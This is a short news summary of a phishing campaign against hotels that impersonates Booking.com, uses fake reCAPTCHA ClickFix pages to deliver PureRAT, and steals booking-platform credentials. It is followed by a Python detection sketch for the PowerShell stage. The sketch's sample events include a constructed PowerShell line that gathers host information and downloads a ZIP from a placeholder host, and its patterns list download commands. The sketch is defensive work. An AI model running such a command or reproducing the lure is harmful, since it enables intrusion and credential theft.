
""The attacker's modus operandi involved using a compromised email account to send malicious messages to multiple hotel establishments," Sekoia said. "This campaign leverages spear-phishing emails that impersonate Booking.com to redirect victims to malicious websites, employing the ClickFix social engineering tactic to deploy PureRAT." The end goal of the campaign is to steal credentials from compromised systems that grant threat actors unauthorized access to booking platforms like Booking.com or Expedia,"
"In the latest wave analyzed by the French cybersecurity company, email messages are sent from a compromised email account to target several hotels across multiple countries, tricking recipients into clicking on bogus links that trigger a redirection chain to a ClickFix page with a supposed reCAPTCHA challenge to "ensure the security of your connection." Upon visiting, the URL redirects users to a web page hosting a JavaScript with an asynchronous function that, after a brief delay, checks whether the page was displayed inside an iframe,"
A large phishing campaign targets the hospitality industry by sending spear-phishing emails from compromised accounts impersonating Booking.com. Recipients are lured to ClickFix-style pages that present a faux reCAPTCHA claiming to ensure connection security. The page runs JavaScript that checks for iframes and redirects users to an HTTP URL. Victims are prompted to copy and run a malicious PowerShell command that collects system information and downloads a ZIP archive containing a binary. That binary deploys malware such as PureRAT and establishes persistence. Compromised credentials for platforms like Booking.com and Expedia are stolen for sale or used to send fraudulent booking communications. Activity has been observed since April 2025 and remained active into October 2025 across multiple countries.
Read at The Hacker News
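A detection sketch for the PowerShell stage summarized above, added here as an example; it is not code from Sekoia or The Hacker News. The simplified event fields, the signal patterns, the `explorer.exe` parent heuristic (assumed because a command the user pastes and runs starts from the desktop shell) and the sample events are all constructed assumptions.

```python
import re

SHELLS = {"powershell.exe", "pwsh.exe"}
# Heuristic signal patterns (assumptions for illustration, not indicators from the report).
SIGNALS = {
    "web_download": re.compile(
        r"\b(invoke-webrequest|iwr|invoke-restmethod|irm|curl|wget|"
        r"start-bitstransfer|downloadfile|downloadstring)\b", re.I),
    "zip_archive": re.compile(r"\.zip\b|\bexpand-archive\b", re.I),
    "host_recon": re.compile(
        r"\b(get-computerinfo|systeminfo|get-ciminstance|get-wmiobject)\b", re.I),
}
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
# Constructed process-creation events (Sysmon Event ID 1 style, simplified); not real telemetry.
SAMPLE_EVENTS = [
    {"host": "frontdesk-01", "parent": r"C:\Windows\explorer.exe", "image": PS,
     "cmdline": 'powershell -c "Get-ComputerInfo | Out-Null; '
                'iwr http://host.example.invalid/pkg.zip -OutFile pkg.zip"'},
    {"host": "backup-01", "parent": r"C:\Windows\System32\svchost.exe", "image": PS,
     "cmdline": "powershell -File nightly.ps1 https://intranet.example.invalid/export.zip"},
    {"host": "frontdesk-02", "parent": r"C:\Windows\explorer.exe", "image": PS,
     "cmdline": r"powershell Get-ChildItem C:\Reports"},
    {"host": "it-admin-01", "parent": r"C:\Windows\explorer.exe", "image": PS,
     "cmdline": "powershell Get-ComputerInfo"},
]

def basename(path):
    """Lower-cased file name of a Windows or POSIX style path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()

def clickfix_signals(event):
    """Signals matched by a PowerShell process whose parent is explorer.exe, else []."""
    if basename(event["image"]) not in SHELLS:
        return []
    if basename(event["parent"]) != "explorer.exe":
        return []  # service or task parents are out of scope for this heuristic
    return [name for name, rx in SIGNALS.items() if rx.search(event["cmdline"])]

def is_suspicious(event):
    """Flag a web download combined with an archive reference or host reconnaissance."""
    hits = clickfix_signals(event)
    return "web_download" in hits and len(hits) >= 2

def flagged_hosts(events):
    """Hosts with at least one suspicious event, in first-seen order."""
    return list(dict.fromkeys(e["host"] for e in events if is_suspicious(e)))

if __name__ == "__main__":
    print(flagged_hosts(SAMPLE_EVENTS))
```

Requiring the download signal plus a second one keeps an administrator's lone `Get-ComputerInfo` from alerting; a hit still needs triage against the command line and the downloaded file.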